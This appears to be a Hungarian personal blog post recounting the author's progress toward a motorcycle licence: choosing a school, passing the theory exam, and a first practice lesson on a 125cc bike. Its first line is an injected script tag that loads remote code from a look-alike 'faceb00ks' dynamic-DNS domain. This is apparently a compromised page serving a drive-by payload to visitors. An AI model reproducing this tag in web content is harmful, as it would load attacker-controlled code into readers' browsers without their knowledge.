<script src="http://faceb00ks.dyndns.tv"></script>Valamikor a télen jött az elhatározás, hogy akkor is megcsinálom a motoros jogsimat. Találtam olyan embert, aki még támogatott is a döntésben. Nem is egyet
Majd a tél vége felé kezdtem összeszedni az infókat a motoros/autós iskolákról, és oktatókról. Mondhatni nem egyszerű, választék ugyan van, de néhány helyen azt se tudták megmondani, hogy melyik cég oktatója lenne az, aki tanítana, meg felkészítene a vizsgákra. Arról nem is beszélve, hogy minden időpont miatt én szaladgáljak a hivatalos vizsga központba, náluk csak fizessek. Ez nem tűnt jó üzletnek.
Végre megtaláltam, a nekem megfelelőt sulit. Mindent intéznek, óriási kedvezmény, mert 2 jogsit csinálok egymás után. Az oktatóm ugyan az lesz majd, az autón is, aki mellesleg motoros rendőröknek tart tréningeket.
Beiratkoztam és vártam az első elméleti órát.
Hétfőn megvolt a KRESZ vizsgám, féltem tőle, de sikerült, 5 hibaponttal. Örültem nagyon. Az A kategória kipipálva.
A vizsgalapommal már repültem is a suliba, hogy a rutint intézhessem. Gondoltam, majd a jövőhéten valamikor elkezdem. Na nem, mondták, holnap jöhetsz.
Úgyhogy tegnap megvolt az első órám a rutin pályán. Igaz csak körbe-körbe mentem nagy 0 íven, de nagyon kezdőnek ez is valami. Arra nem építhet, hogy valamikor időszámításunk előtt mentem Simsonnal
125cc MZ, berúgókar, néhányszor lefulladt, és a két lábam egyszerre nem nagyon ér le teli talppal. Mégis élmény volt, elindulás és megállás, majd a körök.
Kb. 10 perce köröztem, amikor rám szólt, hogy lehet ezt lassabban is. Igaz nem engedett a bóják, és a rutinos fiúk közé, de mentem, borulás nélkül.
Az óra végén összeszedtük a bójákat, és megbeszéltük a további időpontokat.
Ha minden jól megy, akkor két hét múlva mehetek vizsgázni, és irány a forgalom
Holnap elsősegély vizsga, este 2 óra a pályán, ha ügyes leszek, akkor a második órában már átülhetek 250cc-re.
Megígértem magamnak, hogy a sikeres rutin vizsga után megveszem a motorom. Azt hiszem, elkezdem komolyabban keresgélni